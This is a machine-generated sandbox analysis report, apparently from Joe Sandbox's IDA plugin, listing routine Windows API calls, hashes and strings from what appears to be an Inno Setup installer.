                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateErrorFileHandleLast
                                                    • String ID: CreateFile
                                                    • API String ID: 2528220319-823142352
                                                    • Opcode ID: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                    • Instruction ID: 870c31508693feaa39a4cce9bbdb9491accbaf3cbacbc975652ec4f9337bcdac
                                                    • Opcode Fuzzy Hash: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                    • Instruction Fuzzy Hash: 88E06D302403447FEA10EA69CCC6F497798AB04728F10C152FA48AF3E2C5B9FC80866C
                                                    APIs
                                                      • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                      • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                      • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                    • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                    • String ID: SHCreateItemFromParsingName$shell32.dll
                                                    • API String ID: 2906209438-2320870614
                                                    • Opcode ID: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                    • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                    • Opcode Fuzzy Hash: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                    • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                    APIs
                                                      • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                      • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                    • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressErrorLibraryLoadModeProc
                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                    • API String ID: 2492108670-2683653824
                                                    • Opcode ID: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                    • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                    • Opcode Fuzzy Hash: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                    • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                    APIs
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448701), ref: 00448644
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486C5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID:
                                                    • API String ID: 2574300362-0
                                                    • Opcode ID: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                    • Instruction ID: 4a5ebe3fee4a2e51bf72c529b0c862ae9b4ea9e2815ff95c09d8a3db799a058c
                                                    • Opcode Fuzzy Hash: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                    • Instruction Fuzzy Hash: 4A515470E00105AFDB40EFA5C481AAEBBF9EB45315F11817FE814BB391DA789E05CB99
                                                    APIs
                                                    • GetSystemMenu.USER32(00000000,00000000,00000000,00481378), ref: 00481310
                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481321
                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481339
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Menu$Append$System
                                                    • String ID:
                                                    • API String ID: 1489644407-0
                                                    • Opcode ID: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                    • Instruction ID: 5c8896f7e766c0ec1e9fe117ebe49108a2e73e6ee011f2acc73c141eda266b91
                                                    • Opcode Fuzzy Hash: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                    • Instruction Fuzzy Hash: F431A0307043441AE711FB759C82BAE3B989B55318F54997BBC00A62E3CA7C9C4A87AD
                                                    APIs
                                                    • 74D41520.VERSION(00000000,?,?,?,00496E0C), ref: 00452504
                                                    • 74D41500.VERSION(00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 00452531
                                                    • 74D41540.VERSION(?,004525A8,?,?,00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 0045254B
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: D41500D41520D41540
                                                    • String ID:
                                                    • API String ID: 2153611984-0
                                                    • Opcode ID: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                    • Instruction ID: e6b34cf6ad4872bd94a826b675f3d2b909ad99421c044533a40ff62eec17d383
                                                    • Opcode Fuzzy Hash: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                    • Instruction Fuzzy Hash: C2219531A00608BFDB01DAA98D519AFB7FCEB4A341F554477FC04E3242E6B9AE04C769
                                                    APIs
                                                    • 73A1A570.USER32(00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B3F9
                                                    • SelectObject.GDI32(?,00000000), ref: 0044B41C
                                                    • 73A1A480.USER32(00000000,?,0044B45C,00000000,0044B455,?,00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B44F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A480A570ObjectSelect
                                                    • String ID:
                                                    • API String ID: 1230475511-0
                                                    • Opcode ID: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                    • Instruction ID: d0000cdbf443d5d41ac7fc8b7796d2cef13fade9d4e1083fbf8e955bfb0ad8b0
                                                    • Opcode Fuzzy Hash: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                    • Instruction Fuzzy Hash: 94217770A04348AFEB11DFA6C851B9FBBB8DB49304F5184BAF904A6682D778D940CB59
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B144,?,00481BA7,?,?), ref: 0044B116
                                                    • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B129
                                                    • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B15D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: DrawText$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 65125430-0
                                                    • Opcode ID: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                    • Instruction ID: 20993999b02ad9b2d132c7482a3993701c750e35562fff3cb1b1e5e45c97fd42
                                                    • Opcode Fuzzy Hash: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                    • Instruction Fuzzy Hash: 9211B9B17046047FEB00DA6A9C82D6F77EDEB49754F10417AF504D7290D6399E0186A9
                                                    APIs
                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                    • TranslateMessage.USER32(?), ref: 00424487
                                                    • DispatchMessageA.USER32(?), ref: 00424491
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 4217535847-0
                                                    • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                    • Instruction ID: b41559e7cef9b8617ee35765752275fac57a970be1b78d71f4432c2d4d9c435b
                                                    • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                    • Instruction Fuzzy Hash: E911943030471096EA20F6A4E94179B73D4DFC1748F80485EF98997382D7BD9E45979F
                                                    APIs
                                                    • SetPropA.USER32(00000000,00000000), ref: 00416662
                                                    • SetPropA.USER32(00000000,00000000), ref: 00416677
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041669E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Prop$Window
                                                    • String ID:
                                                    • API String ID: 3363284559-0
                                                    • Opcode ID: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                    • Instruction ID: 2f709078d098ddf512341954ec1abde5ac178872df7165362e48a9b460053d77
                                                    • Opcode Fuzzy Hash: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                    • Instruction Fuzzy Hash: 11F0B271701210ABDB10AB599C85FA732DCAB09715F16017AB945EF286C6B8DD5087A8
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 0041EE5C
                                                    • IsWindowEnabled.USER32(?), ref: 0041EE66
                                                    • EnableWindow.USER32(?,00000000), ref: 0041EE8C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableEnabledVisible
                                                    • String ID:
                                                    • API String ID: 3234591441-0
                                                    • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                    • Instruction ID: 168d1bb9c0e6e8839a01a9d99d3d7c452caa6e9a1b9b90f31caf5ae3eef8e520
                                                    • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                    • Instruction Fuzzy Hash: 75E06D75100300AAE701AB2BDCC1B5B7ADCAB54350F02843FA9489B292D63ADC408B3C
                                                    APIs
                                                    • SetActiveWindow.USER32(?), ref: 00469E55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: PrepareToInstall
                                                    • API String ID: 2558294473-1101760603
                                                    • Opcode ID: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                    • Instruction ID: e2c6ec18e62d86bdb0c44b4d883dda39cec9e825136043f452d3b1ffdd24169b
                                                    • Opcode Fuzzy Hash: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                    • Instruction Fuzzy Hash: 32A12C34A00105DFCB00EF9AD986EDEB7F5EF48304F5580B6E404AB362D778AE459B99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /:*?"<>|
                                                    • API String ID: 0-4078764451
                                                    • Opcode ID: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                    • Instruction ID: b0c2865fc5a4d1d7a494ca3edaa4dc5a45f3ff44e2e280cd3bc35834766e41d0
                                                    • Opcode Fuzzy Hash: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                    • Instruction Fuzzy Hash: 1671D770B002546AEB20EB66DCC2BEE77A19F44704F50C067F580AB391E779AD85875F
                                                    APIs
                                                    • SetActiveWindow.USER32(?), ref: 00481C3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: InitializeWizard
                                                    • API String ID: 2558294473-2356795471
                                                    • Opcode ID: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                    • Instruction ID: 5241d356f86f5b5e3f0808c496da9b9c49bd8f9ac143394a12901a1e43732a0a
                                                    • Opcode Fuzzy Hash: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                    • Instruction Fuzzy Hash: 411182342452009FD700EBA9ED96B693BE8EB65318F10043BE5018B2A1DA396C01CB2D
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047BFEA,00000000,0047C124), ref: 0047BDE9
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BDB9
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                    • API String ID: 47109696-1019749484
                                                    • Opcode ID: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                    • Instruction ID: 054ff1380bf98a065617cb750ccb895fcb12562a11c78c2a0c7ed737f373e9e0
                                                    • Opcode Fuzzy Hash: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                    • Instruction Fuzzy Hash: F2F082317045186BDA10A65F9C42BEBA69DCB84758F20403BF508DB343DAB99E0242EC
                                                    APIs
                                                    • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: NoModify
                                                    • API String ID: 3702945584-1699962838
                                                    • Opcode ID: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                    • Instruction ID: 1140eb4c3ce40d11de990e217cdc8ecc45d3a806a677c2547659d4957ea667b8
                                                    • Opcode Fuzzy Hash: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                    • Instruction Fuzzy Hash: C6E04FB4640308BFEB04DB55DD4AF6AB7ECDB48724F104059BA049B280E674FE00C669
                                                    APIs
                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    Strings
                                                    • System\CurrentControlSet\Control\Windows, xrefs: 0042DE2E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID: System\CurrentControlSet\Control\Windows
                                                    • API String ID: 71445658-1109719901
                                                    • Opcode ID: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                    • Instruction ID: d7cc6eff87d81a3ef1983a0911a62a1ada5c46f4ff843c2b0821017aeb54f6c2
                                                    • Opcode Fuzzy Hash: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                    • Instruction Fuzzy Hash: 88D0C972910228BBEB00DE89DC41DFB77ADDB19760F45802AFD04AB241C6B4EC519BF8
                                                    APIs
                                                    • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                      • Part of subcall function 0042E314: 73A1A570.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                      • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                      • Part of subcall function 0042E314: 73A1A480.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                    • SendNotifyMessageA.USER32(00010414,00000496,00002711,-00000001), ref: 0047DD02
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A480A570EnumFontsMessageNotifySend
                                                    • String ID:
                                                    • API String ID: 2685184028-0
